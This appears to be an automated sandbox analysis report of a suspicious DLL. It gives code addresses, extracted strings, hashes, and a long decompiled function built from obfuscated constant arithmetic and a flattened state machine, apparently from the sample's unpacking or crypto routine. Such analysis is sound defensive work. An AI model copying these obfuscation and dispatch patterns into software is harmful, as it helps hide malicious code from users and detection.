0x00d4f31e
0x00d4f32a
0x00d4f32f
0x00d4f335
0x00d4f33d
0x00d4f345
0x00d4f34d
0x00d4f355
0x00d4f35d
0x00d4f365
0x00d4f36d
0x00d4f378
0x00d4f383
0x00d4f38e
0x00d4f396
0x00d4f39b
0x00d4f3a3
0x00d4f3ab
0x00d4f3bd
0x00d4f3c0
0x00d4f3c7
0x00d4f3d2
0x00d4f3da
0x00d4f3df
0x00d4f3e7
0x00d4f3ef
0x00d4f3f4
0x00d4f3fc
0x00d4f400
0x00d4f408
0x00d4f410
0x00d4f41d
0x00d4f421
0x00d4f429
0x00d4f431
0x00d4f439
0x00d4f441
0x00d4f449
0x00d4f451
0x00d4f459
0x00d4f461
0x00d4f469
0x00d4f476
0x00d4f47a
0x00d4f482
0x00d4f48d
0x00d4f498
0x00d4f4a3
0x00d4f4ab
0x00d4f4b3
0x00d4f4b8
0x00d4f4c0
0x00d4f4c8
0x00d4f4d0
0x00d4f4d8
0x00d4f4e0
0x00d4f4e8
0x00d4f4f2
0x00d4f4f6
0x00d4f4fa
0x00d4f502
0x00d4f50a
0x00d4f512
0x00d4f51f
0x00d4f523
0x00d4f52b
0x00d4f533
0x00d4f53b
0x00d4f540
0x00d4f548
0x00d4f55a
0x00d4f72e
0x00d4f734
0x00d4f735
0x00000000
0x00d4f735
0x00d4f566
0x00d4f6d1
0x00d4f6d3
0x00d4f6d7
0x00d4f70c
0x00d4f70c
0x00000000
0x00000000
0x00000000
0x00000000
0x00d4f6d9
0x00d4f6d9
0x00d4f6d9
0x00d4f6dd
0x00000000
0x00000000
0x00d4f6df
0x00d4f6f4
0x00d4f6f4
0x00d4f6f7
0x00d4f6fa
0x00d4f6fd
0x00000000
0x00000000
0x00d4f6e8
0x00d4f6ec
0x00000000
0x00000000
0x00d4f6ee
0x00d4f6f1
0x00d4f6f1
0x00d4f6f1
0x00d4f6ff
0x00d4f6ff
0x00d4f701
0x00d4f704
0x00d4f704
0x00d4f707
0x00d4f707
0x00000000
0x00d4f6d9
0x00d4f572
0x00d4f62f
0x00d4f64e
0x00d4f653
0x00d4f65c
0x00d4f663
0x00d4f673
0x00d4f6a2
0x00d4f6ab
0x00d4f6bf
0x00d4f6c4
0x00d4f6c7
0x00000000
0x00d4f6c7
0x00d4f57e
0x00d4f760
0x00d4f778
0x00d4f782
0x00d4f782
0x00d4f786
0x00d4f78f
0x00d4f78f
0x00d4f584
0x00d4f58a
0x00d4f590
0x00d4f59c
0x00d4f5a0
0x00d4f5b4
0x00d4f5cb
0x00d4f5d9
0x00d4f5ef
0x00d4f5f7
0x00d4f5fd
0x00d4f602
0x00d4f602
0x00d4f752
0x00d4f758
0x00000000
0x00000000
0x00000000
0x00d4f75e
0x00d4f74b
0x00d4f74d
0x00000000

Strings

7b>, xrefs: 00D4F4D8
yWS, xrefs: 00D4F2CD
(@, xrefs: 00D4F11B
t[, xrefs: 00D4F01B
<T, xrefs: 00D4F137
y!Nt, xrefs: 00D4F2C2
_s, xrefs: 00D4F2E2
yY, xrefs: 00D4F270
HA^, xrefs: 00D4F126
|t, xrefs: 00D4F1F8

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
API String ID: 0-3414766599
Opcode ID: 0eda86ebe29daea399630ab161dcff49239885342a5110db174bfa7b9283f28f
Instruction ID: e781499169299b5b0d47dd1452230a5c3e5216aeab557b2111104be7bfc05c8f
Opcode Fuzzy Hash: 0eda86ebe29daea399630ab161dcff49239885342a5110db174bfa7b9283f28f
Instruction Fuzzy Hash: D10200725083809FD368CF21C48AA5BBBE2FBC5318F50891DF6D986260D7B59949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00D5061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00D506E5

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 84b76911e3e4d3bc8e60d52dc92b925ae8a444a5e31d632b1018a18e87031609
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: E72113B1C01309ABCF14DFA9D94A9DEBFB5FB20354F108198E529A6291D3B48B04CFA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D38636, Relevance: 39.9, Strings: 31, Instructions: 1175
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00D38636() {
				signed int _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				char _v56;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v100;
				char _v108;
				signed int _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				unsigned int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				unsigned int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				unsigned int _v676;
				signed int _t1259;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1340;
				signed int _t1341;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1384;
				signed int _t1465;
				signed int _t1466;
				signed int _t1469;
				signed int _t1482;
				signed int _t1495;
				signed int _t1498;
				void* _t1500;
				void* _t1504;
				void* _t1505;
				void* _t1506;

				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
				_v548 = 0x612d76;
				_v548 = _v548 + 0xffffb226;
				_v548 = _v548 ^ 0x25733830;
				_v548 = _v548 + 0x94f7;
				_v548 = _v548 ^ 0x25147da1;
				_v608 = 0x8e6410;
				_v608 = _v608 | 0x5e5673b6;
				_v608 = _v608 ^ 0x9913f1ef;
				_v608 = _v608 * 0x3a;
				_t1469 = 0xe6d4a04;
				_v608 = _v608 ^ 0x4490702a;
				_v332 = 0x40e6a4;
				_v332 = _v332 ^ 0x1ba14b53;
				_v332 = _v332 ^ 0x1be1adf7;
				_v388 = 0xd7ca30;
				_t1343 = 0x42;
				_v388 = _v388 / _t1343;
				_v388 = _v388 + 0x3798;
				_v388 = _v388 ^ 0x000f1b75;
				_v216 = 0xd7fc5;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x0004b337;
				_v516 = 0x59f14d;
				_v516 = _v516 >> 0xf;
				_t1344 = 0x4a;
				_v516 = _v516 / _t1344;
				_v516 = _v516 << 0xb;
				_v516 = _v516 ^ 0x00046054;
				_v304 = 0xedc603;
				_v304 = _v304 + 0xffffc02b;
				_v304 = _v304 ^ 0x00efeb53;
				_v232 = 0x637592;
				_t1465 = 0x6f;
				_t1345 = 0x31;
				_v232 = _v232 * 0x71;
				_v232 = _v232 ^ 0x2bef3074;
				_v372 = 0x919268;
				_v372 = _v372 << 9;
				_v372 = _v372 + 0x904f;
				_v372 = _v372 ^ 0x2324b0cf;
				_v484 = 0x568eb3;
				_v484 = _v484 * 0x42;
				_v484 = _v484 / _t1465;
				_v484 = _v484 ^ 0x0034ded9;
				_v472 = 0x365886;
				_v472 = _v472 << 0xc;
				_v472 = _v472 + 0xffff5d21;
				_v472 = _v472 ^ 0x6583ba5b;
				_v436 = 0xdfd34b;
				_v436 = _v436 / _t1345;
				_v436 = _v436 | 0x191717ac;
				_v436 = _v436 ^ 0x1914e100;
				_v196 = 0xd88df0;
				_t1346 = 0x15;
				_v196 = _v196 / _t1346;
				_v196 = _v196 ^ 0x0009e710;
				_v356 = 0xb64ed2;
				_v356 = _v356 >> 0xd;
				_t1340 = 0x1c;
				_t1347 = 0x51;
				_v356 = _v356 * 0x63;
				_v356 = _v356 ^ 0x0006dcaa;
				_v336 = 0x65c0e5;
				_v336 = _v336 * 0x7a;
				_v336 = _v336 >> 3;
				_v336 = _v336 ^ 0x060f054d;
				_v492 = 0x31a1;
				_v492 = _v492 ^ 0x5b528d22;
				_v492 = _v492 << 5;
				_v492 = _v492 ^ 0x6a59b43c;
				_v652 = 0x40a60;
				_v652 = _v652 | 0x6178721b;
				_v652 = _v652 + 0x8e9b;
				_v652 = _v652 / _t1340;
				_v652 = _v652 ^ 0x037a42dd;
				_v272 = 0xf0169f;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x0004695a;
				_v528 = 0x24fae7;
				_v528 = _v528 ^ 0xfec3499d;
				_v528 = _v528 << 0xf;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0001af4c;
				_v188 = 0x9b8757;
				_v188 = _v188 >> 4;
				_v188 = _v188 ^ 0x000b2d6a;
				_v256 = 0x948fd;
				_v256 = _v256 ^ 0xf30bafdb;
				_v256 = _v256 ^ 0xf30b6e1f;
				_v464 = 0x93fe09;
				_v464 = _v464 / _t1347;
				_t1348 = 0x23;
				_v464 = _v464 * 0x7a;
				_v464 = _v464 ^ 0x00d327e8;
				_v648 = 0xd540cd;
				_v648 = _v648 * 0x5c;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 / _t1348;
				_v648 = _v648 ^ 0x0005d45a;
				_v540 = 0x2acc1;
				_v540 = _v540 >> 7;
				_v540 = _v540 << 0x10;
				_t1349 = 0x59;
				_v540 = _v540 / _t1349;
				_v540 = _v540 ^ 0x000fef6f;
				_v264 = 0xfe7d93;
				_v264 = _v264 ^ 0x4bd787a7;
				_v264 = _v264 ^ 0x4b22b45d;
				_v208 = 0x23d5c9;
				_v208 = _v208 ^ 0x8f5a829d;
				_v208 = _v208 ^ 0x8f7555ae;
				_v524 = 0x2aaed2;
				_v524 = _v524 | 0x9661325e;
				_t1495 = 0x5c;
				_v524 = _v524 / _t1495;
				_v524 = _v524 * 0x63;
				_v524 = _v524 ^ 0xa1d330ca;
				_v612 = 0x173148;
				_v612 = _v612 >> 5;
				_v612 = _v612 + 0x14e7;
				_v612 = _v612 / _t1349;
				_v612 = _v612 ^ 0x0000773b;
				_v620 = 0xe48585;
				_v620 = _v620 << 0x10;
				_v620 = _v620 * 0x32;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0028030c;
				_v500 = 0xfd3bdc;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0xf4e13163;
				_v520 = 0xe4fc5f;
				_v520 = _v520 + 0xa13e;
				_v520 = _v520 + 0xffff7828;
				_v520 = _v520 ^ 0x4d340404;
				_v520 = _v520 ^ 0x4dd63175;
				_v360 = 0x9532ce;
				_v360 = _v360 ^ 0xdad74cca;
				_v360 = _v360 | 0x8468d9e2;
				_v360 = _v360 ^ 0xde69f572;
				_v604 = 0x3a7c91;
				_v604 = _v604 | 0x10f1a45d;
				_v604 = _v604 + 0xffff6d1e;
				_v604 = _v604 | 0x776d764a;
				_v604 = _v604 ^ 0x77f7c5e5;
				_v212 = 0x6e3f57;
				_t279 =  &_v212; // 0x6e3f57
				_v212 =  *_t279 * 3;
				_v212 = _v212 ^ 0x01468193;
				_v220 = 0x58f789;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0b1ef21b;
				_v236 = 0x737654;
				_v236 = _v236 + 0xe2b4;
				_v236 = _v236 ^ 0x0073a4da;
				_v416 = 0xc8c3a8;
				_v416 = _v416 ^ 0x4478b906;
				_v416 = _v416 * 0xc;
				_v416 = _v416 ^ 0x384ff3ff;
				_v576 = 0x407f47;
				_v576 = _v576 + 0x1a0d;
				_v576 = _v576 * 0x63;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x63e80fef;
				_v228 = 0x9b4b6;
				_v228 = _v228 + 0xffffd2d4;
				_v228 = _v228 ^ 0x000d2243;
				_v552 = 0xb96e33;
				_v552 = _v552 + 0x4381;
				_v552 = _v552 * 0xf;
				_v552 = _v552 + 0xffffbee9;
				_v552 = _v552 ^ 0x0ae545e5;
				_v560 = 0xe19e88;
				_v560 = _v560 | 0xc222c343;
				_v560 = _v560 / _t1465;
				_v560 = _v560 + 0x567c;
				_v560 = _v560 ^ 0x01c941bb;
				_v568 = 0xf463df;
				_v568 = _v568 | 0x401122c6;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0xf3373c61;
				_v568 = _v568 ^ 0xfb38c632;
				_v392 = 0xa88994;
				_v392 = _v392 >> 2;
				_v392 = _v392 + 0xfffffc92;
				_v392 = _v392 ^ 0x002883f3;
				_v544 = 0x16009;
				_v544 = _v544 ^ 0x700f0ae7;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0xffffa581;
				_v544 = _v544 ^ 0xcd57c12d;
				_v400 = 0x4e3251;
				_v400 = _v400 << 0xd;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0x510ef6f0;
				_v408 = 0xce49b4;
				_v408 = _v408 / _t1340;
				_v408 = _v408 | 0xa9ee0ad6;
				_v408 = _v408 ^ 0xa9ed29cd;
				_v368 = 0xfab4ff;
				_v368 = _v368 ^ 0x8bb4f731;
				_v368 = _v368 + 0x4788;
				_v368 = _v368 ^ 0x8b4dbddc;
				_v376 = 0x3b857d;
				_v376 = _v376 + 0xd8be;
				_v376 = _v376 ^ 0x0c7e0de1;
				_v376 = _v376 ^ 0x0c4b703c;
				_v384 = 0x702b67;
				_v384 = _v384 + 0x7016;
				_v384 = _v384 | 0xc6195e9d;
				_v384 = _v384 ^ 0xc67058d5;
				_v536 = 0xd092b2;
				_v536 = _v536 + 0xffff63c4;
				_v536 = _v536 | 0x81cb3080;
				_v536 = _v536 ^ 0x4ecdb7ae;
				_v536 = _v536 ^ 0xcf0bdc69;
				_v248 = 0xf8c39f;
				_v248 = _v248 | 0x0e89bf31;
				_v248 = _v248 ^ 0x0ef3b328;
				_v556 = 0x54f798;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0xd52f7ed0;
				_v556 = _v556 >> 6;
				_v556 = _v556 ^ 0x03531d7d;
				_v672 = 0xe1b7ad;
				_t1350 = 0x7a;
				_v672 = _v672 / _t1350;
				_v672 = _v672 << 0xc;
				_t1351 = 0xa;
				_v672 = _v672 / _t1351;
				_v672 = _v672 ^ 0x02f2c9f1;
				_v676 = 0xf0d76a;
				_v676 = _v676 >> 3;
				_v676 = _v676 + 0xffffb109;
				_v676 = _v676 >> 4;
				_v676 = _v676 ^ 0x0006f826;
				_v200 = 0xd1b71d;
				_t1352 = 0x7c;
				_v200 = _v200 / _t1352;
				_v200 = _v200 ^ 0x0006a6d0;
				_v596 = 0x496d6a;
				_t459 =  &_v596; // 0x496d6a
				_v596 =  *_t459 * 0x6b;
				_v596 = _v596 + 0xbb66;
				_v596 = _v596 + 0xffff602d;
				_v596 = _v596 ^ 0x1ebb8efb;
				_v404 = 0xf3863;
				_v404 = _v404 >> 0xe;
				_t1353 = 0x2a;
				_v404 = _v404 / _t1353;
				_v404 = _v404 ^ 0x00094758;
				_v476 = 0x611fd8;
				_v476 = _v476 | 0xb878f5dc;
				_v476 = _v476 + 0xad5b;
				_v476 = _v476 ^ 0xb87809fa;
				_v460 = 0xcf43a7;
				_v460 = _v460 ^ 0xdec9221b;
				_v460 = _v460 ^ 0xf00bdbd0;
				_v460 = _v460 ^ 0x2e089b39;
				_v340 = 0x6e2519;
				_v340 = _v340 + 0xffff23bc;
				_v340 = _v340 + 0xffffab38;
				_v340 = _v340 ^ 0x00658e81;
				_v468 = 0x6e95b3;
				_v468 = _v468 | 0xe42d871f;
				_v468 = _v468 + 0xffff0334;
				_v468 = _v468 ^ 0xe4661c95;
				_v184 = 0x976a3e;
				_v184 = _v184 >> 2;
				_v184 = _v184 ^ 0x002fb3e7;
				_v640 = 0xf929b2;
				_v640 = _v640 >> 4;
				_v640 = _v640 + 0x46ec;
				_t1354 = 0x4e;
				_v640 = _v640 * 0x14;
				_v640 = _v640 ^ 0x013b9ce5;
				_v288 = 0x293a87;
				_v288 = _v288 * 0x1a;
				_v288 = _v288 ^ 0x042f344b;
				_v300 = 0x77766c;
				_v300 = _v300 + 0xffff170c;
				_v300 = _v300 ^ 0x007d4cee;
				_v308 = 0x8e9aa4;
				_v308 = _v308 / _t1354;
				_v308 = _v308 ^ 0x00052c4e;
				_v456 = 0x218ab6;
				_v456 = _v456 / _t1340;
				_v456 = _v456 << 8;
				_v456 = _v456 ^ 0x0138796e;
				_v632 = 0x66de5e;
				_v632 = _v632 + 0xffff10e7;
				_v632 = _v632 << 8;
				_v632 = _v632 + 0xffffeb43;
				_v632 = _v632 ^ 0x65e84e4c;
				_v412 = 0x242a03;
				_v412 = _v412 << 3;
				_v412 = _v412 >> 4;
				_v412 = _v412 ^ 0x00169ab3;
				_v580 = 0x395796;
				_v580 = _v580 << 7;
				_v580 = _v580 >> 9;
				_v580 = _v580 + 0xb065;
				_v580 = _v580 ^ 0x000e083d;
				_v192 = 0xd019c8;
				_t1355 = 0x29;
				_v192 = _v192 / _t1355;
				_v192 = _v192 ^ 0x000d0418;
				_v364 = 0x5114b6;
				_v364 = _v364 << 9;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0xb6040cfd;
				_v452 = 0xdc8bb5;
				_v452 = _v452 ^ 0xb07e6e5f;
				_v452 = _v452 << 0xe;
				_v452 = _v452 ^ 0xb9795724;
				_v572 = 0xdefa33;
				_v572 = _v572 + 0xae39;
				_t1356 = 0x16;
				_v572 = _v572 * 0x56;
				_v572 = _v572 * 0x33;
				_v572 = _v572 ^ 0xf7eaa6cf;
				_v280 = 0x106c99;
				_v280 = _v280 ^ 0xf1e2e143;
				_v280 = _v280 ^ 0xf1f1647c;
				_v444 = 0x12ba83;
				_v444 = _v444 + 0xffff2e0b;
				_v444 = _v444 | 0x954218b9;
				_v444 = _v444 ^ 0x95501631;
				_v636 = 0x6f6552;
				_v636 = _v636 * 0x3a;
				_v636 = _v636 * 0x63;
				_v636 = _v636 ^ 0xc29eccb8;
				_v508 = 0x9979f;
				_v508 = _v508 >> 3;
				_v508 = _v508 + 0xffff8ecf;
				_v508 = _v508 ^ 0x0008ebd3;
				_v504 = 0x338317;
				_v504 = _v504 + 0xffff3917;
				_v504 = _v504 >> 1;
				_v504 = _v504 ^ 0x001e4512;
				_v420 = 0x2775fd;
				_v420 = _v420 / _t1356;
				_v420 = _v420 | 0x1f6013d3;
				_v420 = _v420 ^ 0x1f654eff;
				_v656 = 0x7dcf58;
				_v656 = _v656 ^ 0x77b5ed19;
				_v656 = _v656 + 0x312f;
				_v656 = _v656 << 0xe;
				_v656 = _v656 ^ 0x14d47f34;
				_v488 = 0x685995;
				_v488 = _v488 >> 9;
				_v488 = _v488 + 0xe674;
				_v488 = _v488 ^ 0x000367d5;
				_v328 = 0x4f2a8a;
				_t1357 = 0x30;
				_v328 = _v328 * 0x6c;
				_v328 = _v328 ^ 0x2165dbb2;
				_v664 = 0xf8ddee;
				_v664 = _v664 + 0xffffc10e;
				_v664 = _v664 + 0x5798;
				_v664 = _v664 | 0xdb7e095f;
				_v664 = _v664 ^ 0xdbfa1ad3;
				_v616 = 0xdf2722;
				_v616 = _v616 << 0x10;
				_v616 = _v616 << 0xf;
				_v616 = _v616 << 5;
				_v616 = _v616 ^ 0x0003a7ab;
				_v284 = 0x367b22;
				_t693 =  &_v284; // 0x367b22
				_v284 =  *_t693 / _t1357;
				_v284 = _v284 ^ 0x00041d99;
				_v292 = 0xfb329f;
				_v292 = _v292 + 0xffffce68;
				_v292 = _v292 ^ 0x00fc3f30;
				_v624 = 0xe6983f;
				_v624 = _v624 * 0x70;
				_v624 = _v624 ^ 0x3704df59;
				_v624 = _v624 * 9;
				_v624 = _v624 ^ 0xf3155be5;
				_v260 = 0xc363a2;
				_v260 = _v260 ^ 0x1025f5e4;
				_v260 = _v260 ^ 0x10ec772f;
				_v268 = 0x606a55;
				_v268 = _v268 >> 3;
				_v268 = _v268 ^ 0x000fc817;
				_v600 = 0xd902a;
				_v600 = _v600 >> 0xb;
				_v600 = _v600 << 1;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x00039c6b;
				_v276 = 0xc6f76b;
				_v276 = _v276 + 0xc129;
				_v276 = _v276 ^ 0x00cee0d7;
				_v440 = 0x65c4cc;
				_v440 = _v440 ^ 0xf07a0639;
				_t1358 = 0x69;
				_v440 = _v440 * 0x5f;
				_v440 = _v440 ^ 0x1bc0a904;
				_v584 = 0x39d860;
				_v584 = _v584 * 0x58;
				_v584 = _v584 + 0x4905;
				_v584 = _v584 * 0x2a;
				_v584 = _v584 ^ 0x432fbf1f;
				_v448 = 0xf8616a;
				_v448 = _v448 >> 4;
				_v448 = _v448 + 0xfd7e;
				_v448 = _v448 ^ 0x0010392b;
				_v244 = 0x3f99e5;
				_v244 = _v244 | 0x57277205;
				_v244 = _v244 ^ 0x57370e4e;
				_v348 = 0xf9a67d;
				_v348 = _v348 + 0xffff1738;
				_v348 = _v348 + 0xa0df;
				_v348 = _v348 ^ 0x00f7be80;
				_v564 = 0x164474;
				_v564 = _v564 + 0xffff8d5e;
				_v564 = _v564 | 0xc2a179fa;
				_v564 = _v564 / _t1358;
				_v564 = _v564 ^ 0x01d1c3a4;
				_v668 = 0xe03ad;
				_v668 = _v668 + 0xffffcc8a;
				_t1359 = 0x3c;
				_v668 = _v668 / _t1359;
				_v668 = _v668 | 0xd2e9204d;
				_v668 = _v668 ^ 0xd2e45507;
				_v532 = 0xe9adcf;
				_v532 = _v532 + 0xffffcf22;
				_v532 = _v532 + 0xfffffe50;
				_t1360 = 0x7b;
				_v532 = _v532 / _t1360;
				_v532 = _v532 ^ 0x000617c2;
				_v204 = 0x5a4d2e;
				_v204 = _v204 + 0xffff4d75;
				_v204 = _v204 ^ 0x00531e36;
				_v224 = 0xf2d317;
				_v224 = _v224 * 3;
				_v224 = _v224 ^ 0x02d347bf;
				_v644 = 0xc36dbf;
				_v644 = _v644 + 0xffff71a3;
				_v644 = _v644 | 0x544094bf;
				_v644 = _v644 + 0x4309;
				_v644 = _v644 ^ 0x54c28134;
				_v296 = 0xcf1d90;
				_v296 = _v296 | 0x31ca05e0;
				_v296 = _v296 ^ 0x31c90339;
				_v588 = 0xc34a2d;
				_v588 = _v588 >> 8;
				_v588 = _v588 >> 4;
				_v588 = _v588 + 0x75c1;
				_v588 = _v588 ^ 0x000d315f;
				_v240 = 0xeb7d33;
				_v240 = _v240 + 0xffffc753;
				_v240 = _v240 ^ 0x00e8d488;
				_v180 = 0x669bed;
				_v180 = _v180 / _t1495;
				_v180 = _v180 ^ 0x0002c9fb;
				_v496 = 0xfe0b00;
				_v496 = _v496 ^ 0x5fe703de;
				_v496 = _v496 << 6;
				_v496 = _v496 ^ 0xc645a863;
				_v660 = 0x916252;
				_v660 = _v660 >> 3;
				_v660 = _v660 << 0xd;
				_v660 = _v660 + 0xffff7dae;
				_v660 = _v660 ^ 0x458d7e10;
				_v320 = 0x2cf738;
				_v320 = _v320 | 0xc975dcc7;
				_v320 = _v320 ^ 0xc9795cda;
				_v312 = 0xb1d1ee;
				_v312 = _v312 + 0xffff51df;
				_v312 = _v312 ^ 0x00b16bbb;
				_v344 = 0x3e092b;
				_v344 = _v344 >> 2;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xe09a27cb;
				_v352 = 0x68a1a;
				_v352 = _v352 + 0xc791;
				_v352 = _v352 | 0x7642bfae;
				_v352 = _v352 ^ 0x76458494;
				_v512 = 0xe86ea0;
				_v512 = _v512 + 0xf959;
				_v512 = _v512 | 0x4e18ffd8;
				_t1361 = 0x17;
				_v512 = _v512 / _t1361;
				_v512 = _v512 ^ 0x036c12f7;
				_v396 = 0xe760c6;
				_t1362 = 0x26;
				_v396 = _v396 * 0x31;
				_v396 = _v396 * 0x56;
				_v396 = _v396 ^ 0xe1869eee;
				_v316 = 0x7a30c6;
				_v316 = _v316 / _t1362;
				_v316 = _v316 ^ 0x0003103d;
				_v628 = 0x4f3273;
				_t1363 = 0x78;
				_v628 = _v628 / _t1363;
				_v628 = _v628 << 0xa;
				_v628 = _v628 ^ 0x53aad572;
				_v628 = _v628 ^ 0x51090573;
				_v380 = 0x21784b;
				_v380 = _v380 << 7;
				_v380 = _v380 << 9;
				_v380 = _v380 ^ 0x784b0fa0;
				_v428 = 0xd8c839;
				_v428 = _v428 + 0x77d0;
				_v428 = _v428 >> 2;
				_v428 = _v428 ^ 0x00364f42;
				_v324 = 0x188352;
				_v324 = _v324 + 0xffffa07e;
				_v324 = _v324 ^ 0x00159870;
				_v252 = 0xe98be6;
				_v252 = _v252 >> 2;
				_v252 = _v252 ^ 0x0037d959;
				_v480 = 0xa4f1f5;
				_t1364 = 0x59;
				_t1466 = _v500;
				_v480 = _v480 / _t1364;
				_v480 = _v480 + 0xffff7faf;
				_v480 = _v480 ^ 0x000fae01;
				_v592 = 0x82c23d;
				_v592 = _v592 + 0x5741;
				_v592 = _v592 ^ 0x9a18022a;
				_v592 = _v592 << 0x10;
				_v592 = _v592 ^ 0x1b5af420;
				_v424 = 0x341aa7;
				_v424 = _v424 | 0xfb8ffeba;
				_v424 = _v424 ^ 0xfbbf8b8f;
				_v432 = 0xf44743;
				_t1365 = 0x76;
				_t1341 = _v500;
				_v432 = _v432 / _t1365;
				_v432 = _v432 / _t1365;
				_v432 = _v432 ^ 0x0000ee1d;
				goto L1;
				do {
					while(1) {
						L1:
						_t1504 = _t1469 - 0x856f9ca;
						if(_t1504 <= 0) {
						}
						L2:
						if(_t1504 == 0) {
							_t1259 = E00D427F9();
							L113:
							return _t1259;
						}
						_t1505 = _t1469 - 0x39ddd07;
						if(_t1505 > 0) {
							__eflags = _t1469 - 0x5c221fd;
							if(__eflags > 0) {
								__eflags = _t1469 - 0x627e178;
								if(_t1469 == 0x627e178) {
									_t1259 = E00D52009();
									_t1469 = 0xa51fadb;
									while(1) {
										L1:
										_t1504 = _t1469 - 0x856f9ca;
										if(_t1504 <= 0) {
										}
										goto L54;
									}
									goto L2;
								}
								__eflags = _t1469 - 0x6362904;
								if(_t1469 == 0x6362904) {
									_t1259 = E00D34B5D();
									_t1469 = 0x223c7a9;
									continue;
								}
								__eflags = _t1469 - 0x7a1cd5a;
								if(_t1469 == 0x7a1cd5a) {
									E00D4E955();
									_t1259 = E00D4D111();
									asm("sbb esi, esi");
									_t1469 = ( ~_t1259 & 0x02cd2b2b) + 0x6362904;
									continue;
								}
								__eflags = _t1469 - 0x8488c7d;
								if(_t1469 != 0x8488c7d) {
									break;
								}
